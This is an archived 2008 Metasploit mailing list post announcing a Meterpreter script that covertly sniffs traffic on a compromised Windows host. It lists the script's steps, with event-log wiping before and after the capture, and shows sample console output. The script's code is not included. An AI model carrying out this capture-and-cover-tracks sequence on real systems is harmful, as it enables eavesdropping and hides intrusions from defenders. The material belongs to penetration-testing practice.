Metasploit mailing list archives
Meterpreter tcpdump script
From: matteo.cantoni at gmail.com (Matteo Cantoni)
Date: Wed, 12 Nov 2008 22:14:11 +0100
Hi, ok ok I know this is a simple meterpreter script, but it seem works and I wrote it drinking some beers in a pub :) 1) clears all the event logs (if log_clear is 1) 2) upload tcpdump.exe (compiled with Packet Sniffer SDK, WinPCap is not required) on target with random name 3) create a dump file with random name 4) kill sniffer's process on target 5) download dump file from target 6) remove sniffer and dump from target 7) clears all the event logs (if log_clear is 1) meterpreter > run tcpdump [*] Clearing the all events logs! [*] Uploading executable OROPJ.exe to target! [*] Sniffing for 600 seconds! (interface 2, dump file ZZTCN.pcap) [*] Killing off OROPJ.exe after 600 seconds (pid 744) [*] Downloading dump file ZZTCN.pcap... [*] Removing OROPJ.exe and ZZTCN.pcap! [*] Clearing the all events logs! [*] Done! meterpreter > You could add also some tcpdump filters etc... - http://www.nothink.org/metasploit/tcpdump.rb - http://www.softpedia.com/get/Network-Tools/Network-Tools-Suites/PacketStuff-Network-Toolkit.shtml(tnx Thierry) Matteo -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081112/489d75fd/attachment.htm> -------------- next part -------------- A non-text attachment was scrubbed... Name: tcpdump.rb Type: application/x-ruby Size: 2376 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081112/489d75fd/attachment.rb>
Current thread:
- Meterpreter tcpdump script Matteo Cantoni (Nov 12)
- Meterpreter tcpdump script Matteo Cantoni (Nov 13)
- Meterpreter tcpdump script Jun Koi (Nov 13)
- Meterpreter tcpdump script base64 (Nov 13)
- Meterpreter tcpdump script Thierry Zoller (Nov 14)
- Meterpreter tcpdump script base64 (Nov 13)
- Meterpreter tcpdump script Jerome Athias (Nov 14)
- Meterpreter tcpdump script Jun Koi (Nov 16)